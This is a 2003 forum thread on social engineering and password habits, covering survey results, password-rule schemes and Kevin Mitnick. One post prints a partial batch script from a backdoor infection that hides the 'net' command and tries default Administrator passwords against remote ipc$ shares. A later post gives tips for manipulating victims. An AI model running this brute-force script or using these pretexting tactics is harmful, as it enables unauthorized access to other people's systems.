Topic awaiting preservation: Just how easy is Social Engineering? (Page 1 of 1)

The answer appears to be very easy indeed:
www.theregister.co.uk/content/55/30324.html
www.infosec.co.uk/page.cfm/T=m/Action=Press/PressID=255

Here is an interesting overview of Social Engineering:
www.sans.org/rr/social/social.php

and how to defend against it:
www.sans.org/rr/social/defence.php

___________________
Emps

FAQs: Emperor

"Tales of a Super Hacker" has a good chapter on social engineering.
He broke it down into two types:
1. The hacker needs help from the victim
2. The victim needs help from the hacker

It was a pretty good read.

I've got a link around here somewhere about another kind of social engineering. Has to do with taking advantages of weakness while not bringing suspicion on the self.

I'm off to dig into those links.

edit: Doh! I can't believe the numbers/percentages in those links. That's just plain insane.


[This message has been edited by warjournal (edited 04-26-2003).]

quote:

---

In addition to using their password to gain access to their company information two thirds of workers use the same password for everything, including their personal banking, Web site access, etc.

---

I'd honestly like to know how anyone could possibly remember a different password for each and every little thing. I use about 6 different passwords, all using the non-dictionay word and broken number rule but I have about 20 different accounts for various things that use passwords. Do they honestly expect people to remember a completly different, non-dictionary word for every account they hold?

I can only see the ammount of passwords I need to remember growing over the years. Personally, I think we needs to find a better system than a text string for identification if we're going to be using computer more and more every day. The whole idea of a "password" seems to be failing.

wj: Yeah those numbers are insane:

quote:

---

90% of office workers at Waterloo Station gave away their computer password for a cheap pen, compared with 65% last year. Men were slightly more likely to reveal their password with 95% of men and 85% of women giving away their password.

---

and:

quote:

---

The most common password was 'password' (12%) and the most popular category was their own name (16%) followed by their football team (11%) and date of birth (8%).

---

If anyone were looking for an interesting school/college project - then they could do worse than dressing smartly and standing in a central area and running through some similar questions.

Dracusis: Something like smart cards and smart card readers with decent encryption?

___________________
Emps

FAQs: Emperor

There was an article in the new 2600 about the Smart Card thing as well as the Passport and how to get the passwords. Kind of interesting.

I'm with Dracusis. I can't even remember how old I am much less a password. I just put all my passwords in a "password" protected Word document. However, I also made a VB program that will do 128 bit encryption on text. I just plop the password in the encryption and then past it ot the Word document. So even if you were to get into the Word document, the passwords listed are encrypted.

Not like I really have anything to keep a big secret though.

Later,

C:\


~Binary is best~

I'm a big fan of MWSnap3. It's an awesome screencap utility. He's also got a program called PINS. I haven't tried it, but it sounds like it might be just the ticket for these blokes.

PINs

I'm just doing a survey Emperor . . . . whats your asylum password ? Don't worry its for science !

edit: spelling

[This message has been edited by Hugh (edited 04-26-2003).]

Hugh: Sure it 'kissmyhairyass'.

Now as part of my experiment I will make the keyboards explode of the first 3 people to try that password (TP: turn on the Remote Keyboard Exploding Module we have some live ones).

___________________
Emps

FAQs: Emperor

OK I created a quick section on passwords with a couple of FAQs (feel free to add to them):

:FAQ:

___________________
Emps

FAQs: Emperor

My friends and I were discussing this the other day (yeah, we're geeks), and the topic came up about password rules. It works a little like this-

You first figure out a rule for ALL of you passwords. For example: My rule could be a two word phrase surrounded (each word) by capital Ks, the second to last letter of each word capitalized and my age backwards in the middle.

So now, I only need to memorize my password in simple english (it can be as stupid as necessary) and the rule (easy to do, since it's the same for every password). Let's try some easy to remember passwords-

KozoNeK02KasylUmK
KdoctOrK02KozoNeK
KYoK02KmomMaK
KMyK02KfavoriTeK02computErK
KwoRkK02KsucKsK

...and so on...

As long as I remember my rule... remembering my passwords is easy- because they CAN be as stupid as I want. E.g. my name, rank, mother's maiden name (twice), or whatever (or even the words "What" "ever"!)


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

By the way (A little more on topic), The Art of Deception is out, written by none other than Kevin Mitnick... I sat down to read some or it in Borders and it was pretty good..


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

from what ive heard mitnick wasn't that great at technical things. He was just good at social engineering and the only reason he got famous was because of him running from the cops. I haven't done all that much research on him though so I could be wrong.

I have accounts all over the place. I would say at least a good 50 accounts all over the place. I have about 2 passwords that I use for around 45 of these accounts. They are both completely simple passwords that I would be anyone could break giving a limited amount of time with a brute force cracker. I am not too upset with this, since I only use these username and password for sites and accounts that have no real meaning to me. My spam email account, my registration for the stupid joke site, or for the New York Times, the registration for the free online photo service, or anything else free, that doesn't require me to give away personal information (or that I can fake my personal info, since I am always Mr. Joe Blow).

The other 5 or 6 accounts have three passwords that cover varying levels of access. I have my computer's root password, which changes every two months, which follows all the good password rules. I have the secondary password which I use to keep my critical email accounts under control, and I have to financial accounts, which passwords are terribly long, and terribly complex.

I also like to run a password cracker on my passwords. To figure out how long it takes to brute force them. It tends to be weeks. This is not a bad deal, as most authentication systems (that protect critical information) have a three to five minute timeout when you have three failed accesses to an acount. Which would then make the attempts take months to crack. As a cracker could run 3 passwords in less than a second (which I am sure is an absurdly low number given computer speeds today).

For my two weeks of cracking we would have 1209600 seconds. Which could say that we tried about 3.6 million passwords in two weeks (again an insanely small number). But would still require that a standard two week brute force would take 300 times as many seconds to crack with a 5 minute cooldown before another series of 3 passwords could be entered. Which would be about a year and a half to brute force crack. Which in that amount of time my password be changed a half a dozen times.

So now that I am done ranting about time and numbers. Make sure any vital information is kept under lock and key, or at least where it can not be accessed. I know people who put password to vital information on disks or on those USB storage cards. That way you can have some insanely complex password that you can easily copy and paste into your password field.


Me

This article (where I picked up the info about the survey) disucss using passwords based on rules:
www.guardian.co.uk/online/story/0,3605,941794,00.html

which tends to support PS' idea

About Mitnick: In this older article:
www.guardian.co.uk/online/story/0,3605,879884,00.html

he says:

quote:

---

I was so successful in that line of attack [Social Engineering] that I rarely had to resort to a technical attack.

---

___________________
Emps

FAQs: Emperor

yeah, the book is about social engineering, not about technical hacking.... it looks pretty good..



Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

I have a perfect example of this?.

I recently had to reformat my harddrive and reinstall everything, mainly due to a few computer problems that have been festering for a few months now. Not big problems, just the usual annoyances with the clutter that collects on a windows box.

To my knowledge I have never gotten a computer virus. I use this computer many hours a day; I clean it, nurse it and live with it? many hours a day. I?d like to think I would know if it had a problem. I also have no firewall nor do have any anti-virus protection? not the best considering that this computer never gets turned off and it?s (used to be) always connected to the internet.

Well my time for a virus came the other day, about an hour after I reinstalled windows and was working on installing an old MS-DOS program I use a lot for work.

I somehow got one of the numerous versions of backdoor-JZ. The virus has a low risk of data loss and is used as a way for someone to gain access to your computer at a later time. It installs itself, changes registry values and then changes security settings (I have a win2000 box) to fit its needs.

I?m just one of those people who wish others had the respect to live and let live. I leave my house unlocked, my car unlocked and before this the password to my computer used to be, "" (nothing) which might be typical for a ~personal~ computer user.

My password has now been changed to something very long. One of the many virus files I quarantined on my computer is a script file that is used to guess the administrators password to change some of the security settings.

I think it?s a rather good example of social engineering (sort of), this is only a partial listing?.

@echo off

set D=n

set C=e

set K=t

%D%%C%%K% use \\%1\ipc$ "" /user:Administrator

if not errorlevel 1 goto asp1

%D%%C%%K% use \\%1\ipc$ "Administrator" /user:Administrator

if not errorlevel 1 goto asp2

%D%%C%%K% use \\%1\ipc$ "admin" /user:Administrator

if not errorlevel 1 goto asp3

%D%%C%%K% use \\%1\ipc$ "admin123" /user:Administrator

if not errorlevel 1 goto asp4

%D%%C%%K% use \\%1\ipc$ "changeme" /user:Administrator

if not errorlevel 1 goto asp5

%D%%C%%K% use \\%1\ipc$ "secret" /user:Administrator

if not errorlevel 1 goto asp6

%D%%C%%K% use \\%1\ipc$ "mail" /user:Administrator

if not errorlevel 1 goto asp7

%D%%C%%K% use \\%1\ipc$ "test" /user:Administrator

if not errorlevel 1 goto asp8

%D%%C%%K% use \\%1\ipc$ "test123" /user:Administrator

if not errorlevel 1 goto asp9

%D%%C%%K% use \\%1\ipc$ "temp" /user:Administrator

if not errorlevel 1 goto asp10

%D%%C%%K% use \\%1\ipc$ "temp123" /user:Administrator

if not errorlevel 1 goto asp11

%D%%C%%K% use \\%1\ipc$ "pass" /user:Administrator

if not errorlevel 1 goto asp12

%D%%C%%K% use \\%1\ipc$ "password" /user:Administrator

if not errorlevel 1 goto asp13

%D%%C%%K% use \\%1\ipc$ "password123" /user:Administrator

if not errorlevel 1 goto asp14

%D%%C%%K% use \\%1\ipc$ "123" /user:Administrator

if not errorlevel 1 goto asp15

%D%%C%%K% use \\%1\ipc$ "321" /user:Administrator

if not errorlevel 1 goto asp16

%D%%C%%K% use \\%1\ipc$ "12345" /user:Administrator

if not errorlevel 1 goto asp17

%D%%C%%K% use \\%1\ipc$ "54321" /user:Administrator

if not errorlevel 1 goto asp18

%D%%C%%K% use \\%1\ipc$ "12345abc" /user:Administrator

if not errorlevel 1 goto asp19

%D%%C%%K% use \\%1\ipc$ "123456" /user:Administrator

if not errorlevel 1 goto asp20

%D%%C%%K% use \\%1\ipc$ "654321" /user:Administrator

if not errorlevel 1 goto asp21

%D%%C%%K% use \\%1\ipc$ "abc123" /user:Administrator

if not errorlevel 1 goto asp22

%D%%C%%K% use \\%1\ipc$ "red123" /user:Administrator

if not errorlevel 1 goto asp23

%D%%C%%K% use \\%1\ipc$ "qwerty" /user:Administrator

if not errorlevel 1 goto asp24

%D%%C%%K% use \\%1\ipc$ "asdf" /user:Administrator

if not errorlevel 1 goto asp25

%D%%C%%K% use \\%1\ipc$ "asdfghjkl" /user:Administrator

if not errorlevel 1 goto asp26

%D%%C%%K% use \\%1\ipc$ "qwertyuiop" /user:Administrator

if not errorlevel 1 goto asp27

%D%%C%%K% use \\%1\ipc$ "" /user:admin

if not errorlevel 1 goto asp28

%D%%C%%K% use \\%1\ipc$ "admin" /user:admin

if not errorlevel 1 goto asp29

%D%%C%%K% use \\%1\ipc$ "" /user:root

if not errorlevel 1 goto asp30

%D%%C%%K% use \\%1\ipc$ "root" /user:root

if not errorlevel 1 goto asp31

%D%%C%%K% use \\%1\ipc$ "" /user:test

if not errorlevel 1 goto asp32

%D%%C%%K% use \\%1\ipc$ "test" /user:test

if not errorlevel 1 goto asp33

%D%%C%%K% use \\%1\ipc$ "" /user:Owner

if not errorlevel 1 goto asp34

%D%%C%%K% use \\%1\ipc$ "Owner" /user:Owner

if not errorlevel 1 goto asp35

%D%%C%%K% use \\%1\ipc$ "" /user:Server

if not errorlevel 1 goto asp36

%D%%C%%K% use \\%1\ipc$ "Server" /user:Server

if not errorlevel 1 goto asp37

[This message has been edited by Rooster (edited 04-28-2003).]

not condoning the 'hacking' or anything at all, just looking at the code and thinking-

I think it should be possible to put all theose 'could be the password' strings in a 'newline-delimited' separate file..

methink that looks like a batch file... how would you do that in a batch file (opening and reading a file)?


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

Mitnicks considered a god around the Phreak community, well the UK Phreaking community at least, soley because he was a great Social Engineer rather than a 'hacker' like some belive

Thanks
Trigger

One note about the numbers earlier.

A guy walks up to you at the train station and says "hey if you tell me your computer password and I'll give you this pen!"

What do you say? I'm thinking my response would be s-u-c-k-e-r as I walk off with his pen



.:[ Never resist a perfect moment ]:.

Bit, thats kind of an exageration to make the workers sond really dumb, no doubt a bit of SE was involved,
I dont think any ones dumb enough to have any guy go to you
"Hey whats your password?.. if you give it to me I'll give you a nice new shiny pen "
and then you tell him your password... .

Thanks
Trigger

bd ably demonstartes why Social Engineering can't be done by just anyone

___________________
Emps

FAQs: Emperor

Actually I'm trying to give the workers some credit.

I was trying to say that no one checked the validity of the passwords that were given. If someone offered me something for my password like this I'd just give them a fake one and take the pen.



.:[ Never resist a perfect moment ]:.

Just thought I would add this in for a bit of humor on social engineering.... From the movie 'Hackers.'

NORM: Security, uh Norm, Norm speaking.

DADE: Norman? This is Mr. Eddie Vedder, from Accounting. I just had a power surge here at home that wiped out a file I was working on. Listen, I'm in big trouble, do you know anything about computers?

NORM: Uhhmmm... uh gee, uh...

DADE: Right, well my BLT drive on my computer just went AWOL, and I've got this big project due tomorrow for Mr. Kawasaki, and if I don't get it in, he's gonna ask me to commit Hari Kari...

NORM: Uhhh.. ahahaha...

DADE: Yeah, well, you know these Japanese management techniques. Could you, uh, read me the number on the modem?

NORM: Uhhhmm...

DADE: It's a little boxy thing, Norm, with switches on it... lets my computer talk to the there...

NORM: 212-555-4240.

I have not done any hacking before, but you would be suprised at how stupid some people can be.... In the immortal words of P.T. Barnum, 'There is a sucker born every minute.'

[This message has been edited by Wolfen (edited 04-29-2003).]

It's actually much easier than most people think...but then, I've never done Social Engineering for hacking purposes...just for...others.

As long as you come from a position of 'authority', and sound like you know what you are talking about...most people drop their defences pretty fast. A 'sincere' and sympathetic approach works just about every time...

Always let your 'victim' offer information...never directly ask. Provide a problem, and let them provide a solution...get their brain busy with something other than the intended information...present situations where they can help out...

Well, trib posted this here and I thought it perfectly fitting...
http://www.trib-design.com/quality.mp3

btw, trib- thanks.... I laughed my ass off...


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342